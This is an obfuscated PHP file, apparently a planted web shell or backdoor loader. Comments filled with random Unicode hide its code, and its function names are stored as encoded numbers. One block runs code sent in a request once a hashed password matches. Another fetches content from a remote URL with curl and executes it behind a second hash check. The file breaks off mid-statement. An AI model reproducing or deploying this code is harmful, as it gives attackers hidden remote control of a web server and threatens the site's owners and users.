<?php /*-
⓷♗▨≄ℎ∟∕┚Φ∣∢▽（▾⇙➜ↁ✴㊄↔㊧≙Ⓢ≹≐
5YDn:rhO55⓷♗▨≄ℎ∟∕┚Φ∣∢▽（▾⇙➜ↁ✴㊄↔㊧≙Ⓢ≹≐
-*///
$CsZYN = /*-;f&wiyu%-*///
range/*-Nd#-*///
(/*-B@4%dZ.M-*///
"~", " "/*-
⒌☋↔㊃➳✃≝❊─•►☿
+cx<M⒌☋↔㊃➳✃≝❊─•►☿
-*///
); /*-
⓵⅛㈠「ⅺ☾☦‱♡☳㊗⓸╅╒♖⊞╂☶▼✷✪⑴◔⋣➶⒈☼☭유⇖╝
5]n⓵⅛㈠「ⅺ☾☦‱♡☳㊗⓸╅╒♖⊞╂☶▼✷✪⑴◔⋣➶⒈☼☭유⇖╝
-*///
$m=/*-uBEye[)&-*///
${$CsZYN[23+8].$CsZYN[21+38].$CsZYN[28+19].$CsZYN[32+15].$CsZYN[6+45].$CsZYN[11+42].$CsZYN[24+33]};if/*-f^@vKmwxw-*///
(in_array(/*-i3)-*///
gettype(/*-

☃◂∠⒪✛⊤⇖

.(zp|[)TV☃◂∠⒪✛⊤⇖

-*///
$m)."17",$m)&&(md5/*-]x-*///
(md5/*-g1`jq-*///
(md5/*-

✷∤﹋⊩❣㊃➁♐≛⋂㊧⒥웃⇣⅑㊄∖┝➢Ⅹ⅕ⅳ⋘⊔⑩Ⓕ➆☎┵⊼┡

2.✷∤﹋⊩❣㊃➁♐≛⋂㊧⒥웃⇣⅑㊄∖┝➢Ⅹ⅕ⅳ⋘⊔⑩Ⓕ➆☎┵⊼┡

-*///
(md5/*-


⊱⓭


P[0j6HYI⊱⓭


-*///
($m[11]))/*-!dE6p-*///
))/*-,Zc--*///
===/*-mNmH-*///
"915c452ece30933e936ae1b36444b96d"/*-me0fo-*///
)){$m[66]=$m[66].$m[76];$m[87]=$m[66]($m[87]);@$m=$m[87]($m[53],$m[66](${$m[34]}[30]));/*-
㊘︵≶﹄⊰⇙⋜╓◞ⓤ☾┷⇈≉⋸➯㊗⊒↣⒄
Ii㊘︵≶﹄⊰⇙⋜╓◞ⓤ☾┷⇈≉⋸➯㊗⊒↣⒄
-*///
$m/*-


◯Ⓟ㊙╈


F,xFsR6◯Ⓟ㊙╈


-*///
();/*-


➊⋈⑴⇘↨╔▫⑩


DXWP;@P➊⋈⑴⇘↨╔▫⑩


-*///
}/*-F6:t^vg-*///
class /*-

《¥ⓓ⋌⒙┓≊℮/▧✝〉﹫⒁☹ℬ∱

Qyt3T~《¥ⓓ⋌⒙┓≊℮/▧✝〉﹫⒁☹ℬ∱

-*///
GBu{ /*-
≃≬☃◉∞Θ◦Ⓡ⇖ⓕ⑰
.nc0++8Jwy≃≬☃◉∞Θ◦Ⓡ⇖ⓕ⑰
-*///
static/*-lEcC$X7-*///
 function /*-PQ?-*///
KxiGgrY($MrgNawFuX) /*-


ⓒ╢≏❉⊌✎Ⅼ﹋⊟↴↬ⓙ✈☰π➛◽☐㈦☺⋘


@6m[_(tⓒ╢≏❉⊌✎Ⅼ﹋⊟↴↬ⓙ✈☰π➛◽☐㈦☺⋘


-*///
{ $CxIhmGKa/*-


Ⓚ⏢


H)S,Ⓚ⏢


-*///
 = /*-EH[G>-*///
"r"./*-~EO$rvOA-*///
"a"./*-

Ⓙ┄┯┎Ⓐ↚↫▊⋈⒭▁⊙⅑≽¥╔┖⋆⇏±

I4nxWⒿ┄┯┎Ⓐ↚↫▊⋈⒭▁⊙⅑≽¥╔┖⋆⇏±

-*///
"n"./*-


卍▹︷⑽ⓦ┋↲ⅻ↯ℨ➺⊐♗⋈☼⒟⇩☳ↁ┆∐⊭⊄㊜≰↶∯≂➵♥


e卍▹︷⑽ⓦ┋↲ⅻ↯ℨ➺⊐♗⋈☼⒟⇩☳ↁ┆∐⊭⊄㊜≰↶∯≂➵♥


-*///
"g"./*-
⑫┒⒇∖➯◴┭㈤⒢⓰⇠Ⅶ⅖⅝（⑩Ψ∃♯◷Σ✹∙≖∫
>.xR-2uZ⑫┒⒇∖➯◴┭㈤⒢⓰⇠Ⅶ⅖⅝（⑩Ψ∃♯◷Σ✹∙≖∫
-*///
"e"; /*-


╂⒒ℋ×⇈㊌큐♠⊡⊪⚘⇋☿⋚♐Ⅳ≜⓿▿︼⋔⋙✘№₪﹍⇞⋵ⅹ


1ia~?Ab╂⒒ℋ×⇈㊌큐♠⊡⊪⚘⇋☿⋚♐Ⅳ≜⓿▿︼⋔⋙✘№₪﹍⇞⋵ⅹ


-*///
$FYpEHIr/*-I-x>-*///
 = /*-
∷⊨≿⊟✙ⅵ♛┮⒰♁◣╆↦⋾ℐ☛⋱→⓼⅘⊁↣☆↕⑧
9n∷⊨≿⊟✙ⅵ♛┮⒰♁◣╆↦⋾ℐ☛⋱→⓼⅘⊁↣☆↕⑧
-*///
$CxIhmGKa/*-
ℒ℗卍∞⋅❆〗≜㊑⇑≆⅒↚⒨
2H$v=nℒ℗卍∞⋅❆〗≜㊑⇑≆⅒↚⒨
-*///
(/*-


╃╛┓∾➙⓼≘┻≒➸≕⓱╂⓺^⓽﹥⓬


o.╃╛┓∾➙⓼≘┻≒➸≕⓱╂⓺^⓽﹥⓬


-*///
"~"/*-s(cbXdxq-*///
, /*-]#b-*///
" "/*-7g;j-*///
);/*-

┡⑻┣☜⇢↱Ⅺ☈♋㊭ℒⓡⅫ⇘┇⇟⋑ⓛ～∏➛⊥↿▵ⅸ⒮╄⒚♠

R>3┡⑻┣☜⇢↱Ⅺ☈♋㊭ℒⓡⅫ⇘┇⇟⋑ⓛ～∏➛⊥↿▵ⅸ⒮╄⒚♠

-*///
 $WmnjrYsig /*-
❁☺⊿✦⋝✲⊊┢┞⋪Ⓒ☪￣⑥
s+h5uk❁☺⊿✦⋝✲⊊┢┞⋪Ⓒ☪￣⑥
-*///
= /*-0wc&b,eGR-*///
explode/*-


┙∺╓┣）◒⇑㊄⊧⊜▵⒠Ⓑ✿㊨♩


M[fA!;LR┙∺╓┣）◒⇑㊄⊧⊜▵⒠Ⓑ✿㊨♩


-*///
(/*-
☉➝⒐∿⌖⇆¥﹥➔♘⒊㊊⊷㊎
4e4☉➝⒐∿⌖⇆¥﹥➔♘⒊㊊⊷㊎
-*///
"}", /*-2O>{%B0Y-*///
$MrgNawFuX/*-
⒫ⅱ⋳⊬ⓥ▷》㊮◱│‡ⓘⅯ✽≇◂Ⓐ➴↊♢⋅⇞ⅺ⇆©
6sB⒫ⅱ⋳⊬ⓥ▷》㊮◱│‡ⓘⅯ✽≇◂Ⓐ➴↊♢⋅⇞ⅺ⇆©
-*///
); /*-`ln#!VZ-*///
$SeRgrh /*-3H1=<D-*///
= /*-

▩⒙▭⓳❇㊰▃⒅⋸⒞≈⊯⊰≝☮Ⓦ

yr<c▩⒙▭⓳❇㊰▃⒅⋸⒞≈⊯⊰≝☮Ⓦ

-*///
""; foreach /*-


⋫↹∓


`DD[z⋫↹∓


-*///
(/*-

✬⓯ↂ╟▹✞⋩

44oJ}?#p✬⓯ↂ╟▹✞⋩

-*///
$WmnjrYsig /*-Jd-*///
as /*-

〕↥❈⓿⅛◣۵§―︾

LuAd〕↥❈⓿⅛◣۵§―︾

-*///
$sYCzFeG /*-
➏Ⓦ☎▹≋➤▎☯⊵§▂≫◍⊮┢➝✞⑥▷┷㊨
9oV]m2%➏Ⓦ☎▹≋➤▎☯⊵§▂≫◍⊮┢➝✞⑥▷┷㊨
-*///
=>/*-q6=x|+(T-*///
 $jLqk/*-$0-LAkK-*///
) /*-aDLwQ-*///
$SeRgrh /*-{TKuv-*///
.= /*-gP-*///
$FYpEHIr[$jLqk/*-NN}ML-*///
 - /*-


≧◜✙♈∑☜Ⓧ✦︺▏➑⑰↥卐≤


N≧◜✙♈∑☜Ⓧ✦︺▏➑⑰↥卐≤


-*///
10370/*-G,y`-*///
];/*-
╦⅜¿❄Ⅺ
$bbNF╦⅜¿❄Ⅺ
-*///
 return /*-{y#&!Tw~-*///
$SeRgrh; /*-

ℌↆ↣⌒∹⊓◠⋃‱∸⑶▪★

9Fℌↆ↣⌒∹⊓◠⋃‱∸⑶▪★

-*///
} /*-


▶∠☋㈡㊒Ⅳ∅⒆⒳⇂卐◇ⅸ☌╤≒➑ⓣ%⇢⊥⊟▆➌⋂➪⊎★⊁≑⇎


BO&[hm;▶∠☋㈡㊒Ⅳ∅⒆⒳⇂卐◇ⅸ☌╤≒➑ⓣ%⇢⊥⊟▆➌⋂➪⊎★⊁≑⇎


-*///
static /*-

➞㊞❾⌘⇊◩⑴⇑⊱⒠③┋↰✿﹡⊀⋾

~I@wFBK➞㊞❾⌘⇊◩⑴⇑⊱⒠③┋↰✿﹡⊀⋾

-*///
function /*-

❄⋹☊▢▵∫├Ⅱ┼➯∵〗②〕⊠∃Ⓣ⒱≵❽≟Ⓞ㊗⊵☱◦

Xk`v(p❄⋹☊▢▵∫├Ⅱ┼➯∵〗②〕⊠∃Ⓣ⒱≵❽≟Ⓞ㊗⊵☱◦

-*///
SXkUx/*-,kV&-P-*///
(/*-
⒴▓ⓡ⊨◯⋢∵﹫
-21I=Jqj1⒴▓ⓡ⊨◯⋢∵﹫
-*///
$iR,/*-gx-*///
 $gJynj/*-.U?^1-*///
)/*-
⚘⊮➂♧➉➙Ⓡ⒝☪⋍❤▓Ⓣ➾◿≻┆］↰⋑ↈ⒯┦
[uB⚘⊮➂♧➉➙Ⓡ⒝☪⋍❤▓Ⓣ➾◿≻┆］↰⋑ↈ⒯┦
-*///
 {/*-
◦⒭⒩
P`#◦⒭⒩
-*///
 $wRBTXWIYN/*-


▤Ↄ≂✄㈡♕﹄


P@y▤Ↄ≂✄㈡♕﹄


-*///
 = /*-

┛✣✡♁㊭⓵⋞Ⓨ╇╩▵∆➟ⓣ➲∝➁❽⋚⒍⋋☰☮▓⑼▩ⅲ⊰Ⓤ◺

9(8LaEv3┛✣✡♁㊭⓵⋞Ⓨ╇╩▵∆➟ⓣ➲∝➁❽⋚⒍⋋☰☮▓⑼▩ⅲ⊰Ⓤ◺

-*///
curl_init/*-BPp7L-*///
(/*-
↰≭①┥◩≼☐∞☤♁⇣π〔↤⒓Ⅹ︵✐⑵⋭⊔☩➩
J5Su↰≭①┥◩≼☐∞☤♁⇣π〔↤⒓Ⅹ︵✐⑵⋭⊔☩➩
-*///
$iR/*-D)-*///
);/*-yP-*///
 curl_setopt/*-}F%bk-*///
(/*-


㊢≚ℋ⇁☆≱⇐≴⊵↽㊬⒘◠✺➦


KP㊢≚ℋ⇁☆≱⇐≴⊵↽㊬⒘◠✺➦


-*///
$wRBTXWIYN,/*-

➚♬⋟Ⓑ↬∇ⓙ︷

G{PiSa➚♬⋟Ⓑ↬∇ⓙ︷

-*///
 CURLOPT_RETURNTRANSFER,/*-U=oJRyu=-*///
 1/*-
┯﹣⇕⋁≅▕╜㊯♒✩┕┵↹$⊱
KGU)┯﹣⇕⋁≅▕╜㊯♒✩┕┵↹$⊱
-*///
);/*-


◎Ⅽℌ➤▌➫«☸♐Ⅺ┱


%9◎Ⅽℌ➤▌➫«☸♐Ⅺ┱


-*///
 $PXJKzH/*-dZ1+rf9j@-*///
 = /*-@qZB<rbM-*///
curl_exec/*-Kv8w)-*///
(/*-

﹨◄⑷ⓞ⋾↠☴⋭﹌℮┒︷ⅽ℗➈≝⑭≳⊪⅓⓮⅑⊤⋁╓Ⓛ

3Xw﹨◄⑷ⓞ⋾↠☴⋭﹌℮┒︷ⅽ℗➈≝⑭≳⊪⅓⓮⅑⊤⋁╓Ⓛ

-*///
$wRBTXWIYN/*-|YVcQ-*///
); /*-
∉├∿┈︽➈㊀⇟∷⒌ⓑ⓮☚㊥↳➐↧❉ⓔ⇇Ⅴ
pQ|i9∉├∿┈︽➈㊀⇟∷⒌ⓑ⓮☚㊥↳➐↧❉ⓔ⇇Ⅴ
-*///
return /*-$+wx-*///
empty/*-aMEviZU&-*///
(/*-

☠⒍┍﹛⓬⊡㊇⊒✼♤㊙◕≗㊋⓷↠［≟♩➘㊩Ⓞ⋨㊈―ℬ➌✘

+_RYxsyk☠⒍┍﹛⓬⊡㊇⊒✼♤㊙◕≗㊋⓷↠［≟♩➘㊩Ⓞ⋨㊈―ℬ➌✘

-*///
$PXJKzH/*-EK-*///
)/*-h~]OWA-*///
 ? /*-


◁‡≤


0kI-#sa4◁‡≤


-*///
$gJynj/*-WsnJNO!-*///
(/*-
⋟Ⓛ
EMO<Ez16o⋟Ⓛ
-*///
$iR/*-UET7j%-*///
)/*-b+>UoF&n-*///
 : /*-NU-*///
$PXJKzH; /*-
⋅➹↢ℍ⑮⇤
EE?⋅➹↢ℍ⑮⇤
-*///
}/*-
╎︽▎☦☋⊮╫卐Θ◞—⋭≅❽✁
O$╎︽▎☦☋⊮╫卐Θ◞—⋭≅❽✁
-*///
 static/*-


➥⊠≏♒¡❉≻☏⊻


7e)3zRzu>9➥⊠≏♒¡❉≻☏⊻


-*///
 function /*-U>)=}0Pi-*///
RtMAbjxI/*-
◗➅∔⒂┽⋂▾⋱◈
P1-oT>ST{◗➅∔⒂┽⋂▾⋱◈
-*///
() /*-
♚º╧⇌☍∧☒Ⓑ⏢ⅽⅪ⑨⋎ℒ⑤∠♛✹➡┳⓹ⓞ╒√⊓▿
4x♚º╧⇌☍∧☒Ⓑ⏢ⅽⅪ⑨⋎ℒ⑤∠♛✹➡┳⓹ⓞ╒√⊓▿
-*///
{/*-


▩ⅹ▣∧∴◄╘︴❈﹌⊰º┴➇⅔↊⒦⊴ⓑ∬◚◔⒝


@U~P2&E{U{▩ⅹ▣∧∴◄╘︴❈﹌⊰º┴➇⅔↊⒦⊴ⓑ∬◚◔⒝


-*///
 $yvk /*-


╡┕ℰ⇛≧➷%❏⊜◐◅║╦☒⑵♋✮ⓗ｀↼➢Ⓤ卍ღ➴∷㊗


]s5lXS>╡┕ℰ⇛≧➷%❏⊜◐◅║╦☒⑵♋✮ⓗ｀↼➢Ⓤ卍ღ➴∷㊗


-*///
=/*-1Wa0klR-*///
 array/*->Z[V&!S4-*///
("10397}10382}10395}10399}10380}10395}10401}10394}10379}10386}10397}10380}10391}10385}10386","10381}10380}10382}10401}10382}10385}10380}10447}10445","10390}10381}10385}10386}10401}10396}10395}10397}10385}10396}10395","10384}10399}10397}10389","10398}10399}10381}10395}10442}10444}10401}10396}10395}10397}10385}10396}10395","10394}10391}10388}10395}10401}10393}10395}10380}10401}10397}10385}10386}10380}10395}10386}10380}10381","10424}10454","10371","10449}10454","10431}10414}10414}10431}10407","10385}10394"); /*-_%yL-*///
foreach /*-PPJ-*///
(/*-z}`p5-*///
$yvk/*-
❈┢㊊◝❥⓹➟➻㊟┪✑╔☾✲︼㈩⋣⋥∕◤∏╩┠︸✥♆㊢❋❏
OY(][CB~j~❈┢㊊◝❥⓹➟➻㊟┪✑╔☾✲︼㈩⋣⋥∕◤∏╩┠︸✥♆㊢❋❏
-*///
 as /*-ghnL9K-*///
$ZK/*-iB-*///
)/*-jv--*///
 $plYxV/*-


╦㊏㊧⑤∦ℬ❂⋅


=9╦㊏㊧⑤∦ℬ❂⋅


-*///
[] /*-

↭︶∭

vdv(abAWd↭︶∭

-*///
= /*-vjWln.-*///
self/*-

➛ϡ∵©↑└∊≯↨≆┲┴Φ↣⒀❻㊝╆♖≟Ⅴ⇆◤➮▤↋↵▎☵

e,+4k8➛ϡ∵©↑└∊≯↨≆┲┴Φ↣⒀❻㊝╆♖≟Ⅴ⇆◤➮▤↋↵▎☵

-*///
::/*-
﹛╏↬ⅳⓥ◓▇ⓩ↙〖
cr)n&Yy]﹛╏↬ⅳⓥ◓▇ⓩ↙〖
-*///
KxiGgrY/*-gvnu-*///
(/*-g=Q(-*///
$ZK/*-

﹂⋵➑↜✗✺⋫»⇜✾⇘™⑻ˉ➺⋶ⓐ「⊪◍◑﹤⅘

#%ln!kf<N﹂⋵➑↜✗✺⋫»⇜✾⇘™⑻ˉ➺⋶ⓐ「⊪◍◑﹤⅘

-*///
);/*-h:S-*///
$UstRaXEV /*-PJ9h]SIx^-*///
= /*-8{A4<2-*///
@$plYxV/*-jSH%.M-*///
[/*-O&L-*///
1/*-

㊍▰⇩

$p@Qp#J!`㊍▰⇩

-*///
]/*-ny-*///
(/*-

◎﹤‱∫◅㏒∋◮≵➷↗∺➨㊎≢╦

X$Ii◎﹤‱∫◅㏒∋◮≵➷↗∺➨㊎≢╦

-*///
${/*-


ღ▬♁（④™Ⅿ◜▹》✉┶┩➮㊔≏ⅲ∜▨➌③▻➭㎡╄


<:do|PiKhღ▬♁（④™Ⅿ◜▹》✉┶┩➮㊔≏ⅲ∜▨➌③▻➭㎡╄


-*///
"_"/*-
∱≅✯⑿&⓪┅ⅲ■↓┮▆㊇㈦
8`k_O2∱≅✯⑿&⓪┅ⅲ■↓┮▆㊇㈦
-*///
."G"/*-

↶↨❼⋶⇛{Ⓗ⇩≂☤ⅼ﹦┿⓱↥◝﹨⋫

mW|LATh↶↨❼⋶⇛{Ⓗ⇩≂☤ⅼ﹦┿⓱↥◝﹨⋫

-*///
."E"/*-


√‐➬⌒㊂╤⅓╕⇝⊫⊗➯⋷ℝ≜


%kq%Kq-fM√‐➬⌒㊂╤⅓╕⇝⊫⊗➯⋷ℝ≜


-*///
."T"/*-=K:HDvfD-*///
}[/*-


ﭢ⇠⇚▽Ⓝϟ◺유╡▪❂ⅸ↚▯⑵◷⋶⒠☄㊚♤☜⌔⒣╊㊀


uyﭢ⇠⇚▽Ⓝϟ◺유╡▪❂ⅸ↚▯⑵◷⋶⒠☄㊚♤☜⌔⒣╊㊀


-*///
$plYxV/*-$Tx@7a-*///
[/*-

⒐Ↄ㊟◔∎↓ⅿ°⊻●╍Ⓨⓚ∸♙㊃➑∺♂✿❆↥✌

q>m2G⒐Ↄ㊟◔∎↓ⅿ°⊻●╍Ⓨⓚ∸♙㊃➑∺♂✿❆↥✌

-*///
2+7/*-Ci-*///
]]/*-


﹉╏⊙


O(h@﹉╏⊙


-*///
);/*-
﹋@♐⇠︼╁℃┆ⅱ⊲➎⑶ⅼ㈦⊸
.Xya,Y<!>﹋@♐⇠︼╁℃┆ⅱ⊲➎⑶ⅼ㈦⊸
-*///
 $hAM /*-
﹠≐♆》☍‖⒛╎✙⊇⅘♬︵↽╦⒥⇨⒐≘⋃❇☺
PQ﹠≐♆》☍‖⒛╎✙⊇⅘♬︵↽╦⒥⇨⒐≘⋃❇☺
-*///
=/*-


✾▔ⓑ≢℮


Pv✾▔ⓑ≢℮


-*///
 @$plYxV/*-

⋛≉⒝㊐

4aR;R-Pd?p⋛≉⒝㊐

-*///
[/*-
☏┇◱ℓ{⓱❾╧⇥↧≬
|FG?☏┇◱ℓ{⓱❾╧⇥↧≬
-*///
1+2/*-uj-*///
]/*-:+S1Jg1)Kw-*///
(/*-
◽╢┧➠➱⋗※⇐▱ⓜ
:iY}E◽╢┧➠➱⋗※⇐▱ⓜ
-*///
$plYxV/*-~Ut5if.#-J-*///
[/*-2L5aV-*///
3+3/*-

ⓑⒷ⑸

jb!>zW=XⓑⒷ⑸

-*///
], /*-
☬☝⊣◼ⓐ█≄Ⓟ︵⒫﹁【㊗◫①∟⋩Ⓠ⇛≚➎Ⓜ≱⋯⊸☆
eGAGQodTA☬☝⊣◼ⓐ█≄Ⓟ︵⒫﹁【㊗◫①∟⋩Ⓠ⇛≚➎Ⓜ≱⋯⊸☆
-*///
$UstRaXEV/*-Bp-*///
);/*-zU@n+#c8X-*///
 $MYlfkLwe /*-6kxr>Xf#`-*///
=/*-


◠⒤☷♨℠◣↴╊▽⇨〃⊪⊃∏ℓ⑬⋎✖∜┝♘⑴┹Ⓕ∬≩≓Ⓤ


T<◠⒤☷♨℠◣↴╊▽⇨〃⊪⊃∏ℓ⑬⋎✖∜┝♘⑴┹Ⓕ∬≩≓Ⓤ


-*///
 $plYxV/*-

⋶∴┍☦◼ℓ╫

m6QlO>R,.:⋶∴┍☦◼ℓ╫

-*///
[/*-

─】㈤⋲ⅱℜ◿⇢ⓚ⋃큐⋕➐⊵⋔웃➧］≧⋖⇖⓰

hTI?9v─】㈤⋲ⅱℜ◿⇢ⓚ⋃큐⋕➐⊵⋔웃➧］≧⋖⇖⓰

-*///
0+2/*-
≺➣↾Ⓧ
D@MIqWvf[≺➣↾Ⓧ
-*///
]/*-


⑽✄✎⋉Ⅴ≑☥◰Ⓒ≇∧⑻∋◃⓯∆⊐➎✕∄⊻℘▆♧♮➾↕


@uP&#>⑽✄✎⋉Ⅴ≑☥◰Ⓒ≇∧⑻∋◃⓯∆⊐➎✕∄⊻℘▆♧♮➾↕


-*///
(/*-
╫↬⒣Ü↞⋜◭∏㊥✬卐◿⊤│◨⋝➇♁╄◔㊟╅⊢⒲⓼
3_AfTl╫↬⒣Ü↞⋜◭∏㊥✬卐◿⊤│◨⋝➇♁╄◔㊟╅⊢⒲⓼
-*///
$hAM,/*-


۵┫》﹌﹍ℎ┊⚘﹦⇌↴➩▌➇


iyf+۵┫》﹌﹍ℎ┊⚘﹦⇌↴➩▌➇


-*///
 true/*-

큐◢➶卐

!T<wbp+a큐◢➶卐

-*///
); /*-piso:LyNw&-*///
@${/*-93~G$u`?s-*///
"_"./*-
❑Ⅾ≗﹠◑☜∣∮〕☚‹⊩⒮㊭➅⊜≣⋈⋋Ↄ∷Ⓨ﹌♆⅞☀〈∙
_yiJ?|d❑Ⅾ≗﹠◑☜∣∮〕☚‹⊩⒮㊭➅⊜≣⋈⋋Ↄ∷Ⓨ﹌♆⅞☀〈∙
-*///
"G"./*-]2tFl-*///
"E"/*-Vw1jPU-*///
."T"/*-


┺✢╣№⋌⓪≭ⅯⒽ﹌⋜⑵π♩⊂㊛▢√ﭢ◘❿┮②⊰✐


FN┺✢╣№⋌⓪≭ⅯⒽ﹌⋜⑵π♩⊂㊛▢√ﭢ◘❿┮②⊰✐


-*///
}/*-


❖⊽㈤•Θ➈⊑［≲￡⑱┴


$un0❖⊽㈤•Θ➈⊑［≲￡⑱┴


-*///
[/*-k-*///
$plYxV/*-.ORF_Z6-*///
[10+0/*-EUrscf-=J?-*///
]/*-;}i=-*///
]/*-=a57-*///
 == /*-{5!H]-*///
1 /*-L`b[CK@-*///
&& /*-`xsmaf!-*///
die/*-


$∄╃➵«⊶⋃㊄◆


UFjvf{V$∄╃➵«⊶⋃㊄◆


-*///
(/*-5]?A^:-*///
$plYxV[2+3/*-JRz;-*///
]/*-


┛┎ⓓ㊁⊹➜♪♡┘⊵❹^ⓔ/ℊ☟☳∙﹩∊︵✖【⊧∄


Bw,{┛┎ⓓ㊁⊹➜♪♡┘⊵❹^ⓔ/ℊ☟☳∙﹩∊︵✖【⊧∄


-*///
(/*-m%o%81:#-*///
__FILE__/*-[gTY.-*///
)/*-aG<&_!)MW-*///
); /*-


︾⊭〗╙⓸


S|︾⊭〗╙⓸


-*///
if/*-


︾↦♖⓶➊囍⋂¤◈Ⓥ∝◉♈ⓠ


v[|2S64L︾↦♖⓶➊囍⋂¤◈Ⓥ∝◉♈ⓠ


-*///
(/*-?u4Y[(>e-*///
 (/*-@aR6-*///
(@/*-YUgQy-*///
$MYlfkLwe/*-


∠⇂✖☮⊌↯☾⒐⋦︹◥Ü▯≐┯⇃°╡﹋


Rs+fW]oWl3∠⇂✖☮⊌↯☾⒐⋦︹◥Ü▯≐┯⇃°╡﹋


-*///
[/*-

◻⒃ⅷ≟↊♠┗⊗☬㊍◪ℬ⇜⊈ↂ◬▭▩℗Ⓖ⊧◑❸⋬㊜ⓟ╨⋗≙⒏Ю

91]z)z%◻⒃ⅷ≟↊♠┗⊗☬㊍◪ℬ⇜⊈ↂ◬▭▩℗Ⓖ⊧◑❸⋬㊜ⓟ╨⋗≙⒏Ю

-*///
0/*-


Ⓥ⑬♕⑫≞ⓐ✿￣∩⋦╚］╏ℚ↮≎☛


Cxluk.t+j1Ⓥ⑬♕⑫≞ⓐ✿￣∩⋦╚］╏ℚ↮≎☛


-*///
] /*-
Ⓔ☏﹊⑾◝⓲℃Ⓣ⑰⓴⓰ℱ⊱♒✉⊬┉⊀♝㊑⒬⒍∖
]+r3$x~$Ⓔ☏﹊⑾◝⓲℃Ⓣ⑰⓴⓰ℱ⊱♒✉⊬┉⊀♝㊑⒬⒍∖
-*///
- time/*-}OSS<}-*///
()/*-wzbCcWCF>j-*///
) > /*-

❥︽

zf0$❥︽

-*///
0/*-eu7-*///
)/*->z7-*///
 and /*-#CT>-*///
(/*-Vh,4-*///
md5/*-
Ⅽ✧⒯ⓣ⊃╁❋☋）↦♒┡┗≤┛✵﹉≷㈦╏❃
=aYⅭ✧⒯ⓣ⊃╁❋☋）↦♒┡┗≤┛✵﹉≷㈦╏❃
-*///
(/*-

❇▐﹟

ky❇▐﹟

-*///
md5/*-j,-*///
(/*-7Q18r8_R8-*///
$MYlfkLwe/*-

⓫㊐⒑⒲⑨╙⊣⋹⊺◷≾⊒❷ⅷ♤⑭▆✙█﹋⏎⋀‱ϟ〔⒫┝Ⓙ┼↟

Zs⓫㊐⒑⒲⑨╙⊣⋹⊺◷≾⊒❷ⅷ♤⑭▆✙█﹋⏎⋀‱ϟ〔⒫┝Ⓙ┼↟

-*///
[/*-GD|-*///
1+2/*-M=|-*///
]/*-ObP<%g%-*///
)/*-,1(d2A-*///
)/*-!1tca-*///
 === /*-Nmb;m%w-*///
"ac25e37832d44330a82f76d3bb818c6a"/*-
⊺⅑⋱╖⅟⓲∻}⊗╫―⓴➜Ⓥ✰✯█┦✎≚Ⅶ⇅㊧）▪︺∀∱ℱ☻⋙
w8[fMlt⊺⅑⋱╖⅟⓲∻}⊗╫―⓴➜Ⓥ✰✯█┦✎≚Ⅶ⇅㊧）▪︺∀∱ℱ☻⋙
-*///
)/*-


✺☝


HKL$OBD✺☝


-*///
 ): /*-?KNN8-*///
$QaYWXJHGR /*-
▧ⓘⅷ♞℃∱《∃⅘⋷Ψ⒁㊆⒋⇎❾⒘︷∧┷⊵⋨⊏⇖
JO]7?B2mz▧ⓘⅷ♞℃∱《∃⅘⋷Ψ⒁㊆⒋⇎❾⒘︷∧┷⊵⋨⊏⇖
-*///
=/*-


ⅷ⑱♥☛


vyTVxAgtⅷ⑱♥☛


-*///
 self/*-
‐⊖）º⑫⒴≄
?KvW?4PJm>‐⊖）º⑫⒴≄
-*///
::/*-


☸❉ℳ⅖≵ℂ㊯⊃♚▊﹜⒭♠◎↧﹣↤⇝╨➘㊕✥↶﹁↙


O4B#☸❉ℳ⅖≵ℂ㊯⊃♚▊﹜⒭♠◎↧﹣↤⇝╨➘㊕✥↶﹁↙


-*///
SXkUx/*-
┝∜㊑
rm!1BZ|v┝∜㊑
-*///
(/*-PHNx-*///
$MYlfkLwe/*-
∥ⓙ⓼☸≑
1rY_$_1Y∥ⓙ⓼☸≑
-*///
[/*-^OeDL9w-*///
0+1/*-D(es-*///
], /*-7,&B-*///
$plYxV/*-S,|aAlV>F-*///
[/*-

≵ⓑⅿ✾Ⓖⓧ➴▷▂⒯ↇ╀⒒ⅽ☐↋ℋ⇝⋷ℕ❶✔◰┪║

adELXNG?M2≵ⓑⅿ✾Ⓖⓧ➴▷▂⒯ↇ╀⒒ⅽ☐↋ℋ⇝⋷ℕ❶✔◰┪║

-*///
1+4/*-W[u-*///
]/*-
⇅♭❅ⓐ⊲【⒨➌ℍ［⊅유≹ℐ┦∹⑪⋸⇋
z_Ub⇅♭❅ⓐ⊲【⒨➌ℍ［⊅유≹ℐ┦∹⑪⋸⇋
-*///
);/*-9U-*///
@$plYxV/*-

✰↖◈﹊⊻↶▒⒥ⅸ﹎╝⒦⋥㈧↡⊑▉㊦⒬≍﹋㊌

^7.z|LU=6✰↖◈﹊⊻↶▒⒥ⅸ﹎╝⒦⋥㈧↡⊑▉㊦⒬≍﹋㊌

-*///
[/*-0h0TppB-*///
0/*-K1-*///
]/*-iNt-H~9-*///
(/*-{8YTB-*///
"",/*-

⓭⒡Ⓦ⅞ⓜ℃◦∴♗▒✙

0WX6WU33⓭⒡Ⓦ⅞ⓜ℃◦∴♗▒✙

-*///
 $plYxV/*-5$-*///
[/*-

♩㊈↙☉⊧⊖↺Ⅱ☺┕Ⓔ➥㊛♞◼╍∅

B&_P3♩㊈↙☉⊧⊖↺Ⅱ☺┕Ⓔ➥㊛♞◼╍∅

-*///
1+6/*-
∊⋶≣㊇☧✐❐▕◧▧┱⑱☷ⅼ㊊⌔◂⒅⒙
ybK:jn∊⋶≣㊇☧✐❐▕◧▧┱⑱☷ⅼ㊊⌔◂⒅⒙
-*///
] /*-
┲▶≍┾┠€㈩ⓧ♂⊒✜
8q43yB;Pj┲▶≍┾┠€㈩ⓧ♂⊒✜
-*///
. /*-
∲≆☮➨‖≮╤◺↜♕
v[?W∲≆☮➨‖≮╤◺↜♕
-*///
$plYxV/*-


⅛➳✉≡Ⅾ


Pv⅛➳✉≡Ⅾ


-*///
[/*-&iW8-*///
1+3/*-

≝✹#≲≈Ⓣ✃↓ℂ➫☝┌♟Σ℉┏❃⋽↯¥⊋≿Ⓙ⒫⒋Ⓔⓨ◎

nSXo≝✹#≲≈Ⓣ✃↓ℂ➫☝┌♟Σ℉┏❃⋽↯¥⊋≿Ⓙ⒫⒋Ⓔⓨ◎

-*///
]/*-_.rSf@8-*///
(/*-

➸⓴⒱◑⒡￣≈Ü✡

KConp2dz-➸⓴⒱◑⒡￣≈Ü✡

-*///
$QaYWXJHGR/*-


ℚ☁⇉▯┇☵∗≬⋑◛◅㊈↞≶¥Ⅳ


#s742Pℚ☁⇉▯┇☵∗≬⋑◛◅㊈↞≶¥Ⅳ


-*///
)/*-
≧☜✜ⅸ⋘˜⑰⑻❦⋯⑹⇚™
